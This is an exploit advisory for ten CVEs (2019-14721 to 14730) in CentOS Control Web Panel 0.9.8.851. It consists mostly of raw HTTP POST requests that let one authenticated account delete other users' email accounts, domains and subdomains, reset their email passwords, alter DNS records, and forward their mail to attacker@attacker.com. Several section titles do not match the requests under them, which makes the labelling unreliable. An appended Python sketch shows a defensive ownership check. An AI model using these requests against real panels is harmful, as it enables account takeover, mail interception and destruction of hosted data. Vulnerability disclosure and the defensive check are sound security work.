CVE Number : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730
Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for latest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------
# Access
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=paserrecord HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------
# Delete
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=addregdns HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=&subdomain=

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=
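
Added example (not part of the original advisory and not CWP code): in the requests above, an authenticated account (alice) names another account's object (bob2@bob2, bob.com) in the POST body. A deny-by-default ownership check keyed on the module/acc values seen on this page is sketched below; OWNERS, RULES, authorize and the ownership data are hypothetical and constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed ownership table (assumption): object -> owning panel account.
OWNERS = {
    "email": {"alice@alice.com": "alice", "bob2@bob2": "bob2"},
    "domain": {"alice.com": "alice", "bob.com": "bob"},
}

# (module, acc) pairs as they appear in the requests on this page, mapped to
# the body field that names the object and the kind of object it is.
RULES = {
    ("email_accounts", "updateforwarders"): ("email", "email"),
    ("email_accounts", "emaildelete"): ("email", "email"),
    ("email_accounts", "changpassemail"): ("email", "email"),
    ("dns_zone_editor", "paserrecord"): ("domain", "domain"),
    ("dns_zone_editor", "addregdns"): ("domain", "domain"),
}


def authorize(session_user, target, body):
    """Return (allowed, reason); anything not positively owned is denied.

    session_user must come from server-side session state, never from the
    account name in the URL path or from a request parameter.
    """
    query = parse_qs(urlsplit(target).query)
    key = (query.get("module", [""])[0], query.get("acc", [""])[0])
    if key not in RULES:
        return False, "unmapped action"
    field, kind = RULES[key]
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    if len(values) != 1 or not values[0]:
        # Empty or repeated object references are rejected outright.
        return False, f"missing or repeated {field}"
    if OWNERS[kind].get(values[0]) != session_user:
        return False, f"{field} not owned by session user"
    return True, "ok"


if __name__ == "__main__":
    base = "/cwp_b99b38b4d4ced310/alice/alice/index.php"
    print(authorize("alice", base + "?module=email_accounts&acc=updateforwarders",
                    "email=bob2@bob2&goto=attacker@attacker.com"))
```

The same check belongs in front of every state-changing action; the CSRF token and session cookie in the captured requests establish who is calling, not what that caller may touch.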